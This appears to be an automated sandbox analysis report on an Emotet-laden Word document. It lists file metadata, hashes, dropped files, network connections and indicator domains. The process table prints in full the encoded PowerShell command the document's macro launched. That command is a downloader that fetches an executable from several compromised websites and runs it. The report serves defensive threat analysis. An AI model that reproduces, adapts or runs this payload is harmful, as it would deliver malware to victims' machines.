File name: | JV192660_09182019RWT-58764.doc |
Full analysis: | https://app.any.run/tasks/fe212d1c-ba2d-446d-ba79-a692f022e30a |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 18, 2019, 19:51:15 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: fuchsia Landing, Subject: Reactive, Author: Otha Shields, Comments: SMS Licensed Metal Chicken backing up, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 15:38:00 2019, Last Saved Time/Date: Wed Sep 18 15:38:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0 |
MD5: | 76A982CD430F580ACFB12A3A077A2EDF |
SHA1: | 02A5A4B226FC3E433C01618DB98421C7BE9977FB |
SHA256: | 185AAD1ED76889C3BC266D57BE88A308FE4E327CF628B00BA9BF5CD20F1B8537 |
SSDEEP: | 6144:T3yxNRIIt1POT3XtwNJ6mdxPLkIZ7NSU4jJntATfDeGPy4XSKM:T3yxNRIIt1POT3XtwNJ6mdRXZ7NSU4VN |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | fuchsia Landing |
---|---|
Subject: | Reactive |
Author: | Otha Shields |
Keywords: | - |
Comments: | SMS Licensed Metal Chicken backing up |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:09:18 14:38:00 |
ModifyDate: | 2019:09:18 14:38:00 |
Pages: | 1 |
Words: | 95 |
Characters: | 547 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Torp - Yundt |
Lines: | 4 |
Paragraphs: | 1 |
CharCountWithSpaces: | 641 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Medhurst |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2920 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\JV192660_09182019RWT-58764.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3228 | powershell -encod JAB6AEcASgA0AG4ASgA9ACcAbAB2ADMAdwBLADkAMQA3ACcAOwAkAEwASgB1AEYAcgAzACAAPQAgACcAOAAzADUAJwA7ACQAVQBQAEsAcgB3AGEAUAA9ACcAcQBiAG8AYwBPAFMAQwAnADsAJAByAHIANQBLAFIAdQB3ADEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEwASgB1AEYAcgAzACsAJwAuAGUAeABlACcAOwAkAHoARQB1AEQAaQBCAEIAMAA9ACcATgBVAHoAUABvAGIAQgBCACcAOwAkAFgAdABfAE0AdwBxAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAHcARQBiAGMATABJAGUATgB0ADsAJABkAGoANgBkAG0AcgA9ACcAaAB0AHQAcAA6AC8ALwB0AGgAaQBuAGgAdgB1AG8AbgBnAG0AZQBkAGkAYQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbgAyAGsAZQBlAHAANwAvAEAAaAB0AHQAcABzADoALwAvAG0AbgBwAGEAcwBhAGwAdQBiAG8AbgBnAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBuAHMAbQB6ADkAYQB6ADAAMwAyAC8AQABoAHQAdABwADoALwAvAHQAcgB1AG4AZwBhAG4AaAAuAHgAeQB6AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAegBxADUAMAAvAEAAaAB0AHQAcABzADoALwAvAGkAcAB0AGkAdgBpAGMAaQBuAGkALgBjAG8AbQAvAG4AcABrAHgALwBqAHcAcAB5ADkAMwA4AC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBjAGUAegBhAGUAdgBpAG4AZQBnAG8AbgBkAGUAcgAuAGMAbwBtAC8AYwBvAG4AZgAvAGYAZAA0ADUALwAnAC4AIgBTAHAAbABgAEkAVAAiACgAJwBAACcAKQA7ACQAVABkAFgAbgBpADAAUgA9ACcAZAA0ADcAaQBNADQAMAAnADsAZgBvAHIAZQBhAGMAaAAoACQAbwBqAGoAVQBUAG8AagBCACAAaQBuACAAJABkAGoANgBkAG0AcgApAHsAdAByAHkAewAkAFgAdABfAE0AdwBxAC4AIgBkAG8AdwBOAEwAYABPAEEAYABEAGYAYABpAEwARQAiACgAJABvAGoAagBVAFQAbwBqAEIALAAgACQAcgByADUASwBSAHUAdwAxACkAOwAkAG4ASgBxAHcAOABYAFEAPQAnAEoAQQBBAE4AUQBPADMAVwAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAHIAcgA1AEsAUgB1AHcAMQApAC4AIgBMAGUAbgBHAGAAVABoACIAIAAtAGcAZQAgADIAOQA4ADAANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJAByAHIANQBLAFIAdQB3ADEAKQA7ACQAZABmAHYANQBqADUAPQAnAG8AbgBYAHAAdgBxACcAOwBiAHIAZQBhAGsAOwAkAGwAagBqAEEAWABMADAAPQAnAFUAVwBtAHIAcgAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGkAdwBRAFkAdwBQAD0AJwB3AGgAWAB6AFYAUABpACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA117.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2166BE43.wmf | wmf | |
MD5:6FF4471ADCC913EE9B9570D7F9DAB454 | SHA256:8E3C540113F601634F8F3B215726F9AD3035A1C597EF36486E555DC110E4A158 | |||
2920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8C82F65C.wmf | wmf | |
MD5:4F9623B6E4D73C98B6EE1D305B894DF0 | SHA256:E01D16C354DA14EF703AC03757CA38E974A5AA6A89D36D8F4FD9A03C2D05FFF5 | |||
2920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B026063F.wmf | wmf | |
MD5:33D39B5A8E9E996E8B7B844C3BE7F230 | SHA256:BF047E43C3DBDE90E929DB9E324F87BC446B982A00C9D78E9E3DBC9C17BBE3D9 | |||
2920 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:DFC60684A961A317C54FA7A7466C4247 | SHA256:2385440C8080CC208C02196D98023AD7E01554BF235665A37773135590EB30F5 | |||
2920 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\JV192660_09182019RWT-58764.doc.LNK | lnk | |
MD5:AD7918D3CD5B697A0EECA083E448BAFE | SHA256:075652950CD2681C293C761E72660B0FFF4B135AF17705CB76366519FBDB3F9E | |||
2920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\68E2FFB.wmf | wmf | |
MD5:D0CF0AE5A21BF25CE427867A05822B9D | SHA256:C7C1677CD6AF2486CBF280D22AAD0E7A6AF2C77220C8740D922908F0B5434310 | |||
2920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2A8DB62.wmf | wmf | |
MD5:2FCE5B8B6A3A0D34C293CE21237B0F3D | SHA256:52005A145BACF54D39B82EC7299B897AC7AE83E4C8CB4D87C8701D71950FEF28 | |||
2920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:DC5A3A2F5165222D220571CE8C7694F1 | SHA256:31B7F0081D9ED249372E27AA075BF78782ED0D64A73E579F4C4C89A2D3FA514D | |||
2920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9CF51449.wmf | wmf | |
MD5:8734BC1372D4AC0C3949276C2BF8B492 | SHA256:BA3D6549D5D1C7184EA3016AC04CB0245B1CA187B35F663F453FB13E83C7AFDC |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3228 | powershell.exe | GET | 404 | 124.158.6.218:80 | http://thinhvuongmedia.com/wp-admin/n2keep7/ | VN | xml | 345 b | suspicious |
3228 | powershell.exe | GET | 404 | 104.28.5.162:80 | http://trunganh.xyz/wp-content/uzq50/ | US | xml | 345 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3228 | powershell.exe | 104.28.5.162:80 | trunganh.xyz | Cloudflare Inc | US | shared |
3228 | powershell.exe | 212.47.241.236:443 | www.cezaevinegonder.com | Online S.a.s. | FR | unknown |
3228 | powershell.exe | 124.158.6.218:80 | thinhvuongmedia.com | CMC Telecommunications Services Company | VN | suspicious |
3228 | powershell.exe | 104.27.133.144:443 | mnpasalubong.com | Cloudflare Inc | US | shared |
3228 | powershell.exe | 31.210.70.130:443 | iptivicini.com | Radore Veri Merkezi Hizmetleri A.S. | TR | unknown |
Domain | IP | Reputation |
---|---|---|
thinhvuongmedia.com |
| suspicious |
mnpasalubong.com |
| unknown |
trunganh.xyz |
| suspicious |
iptivicini.com |
| unknown |
www.cezaevinegonder.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
3228 | powershell.exe | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |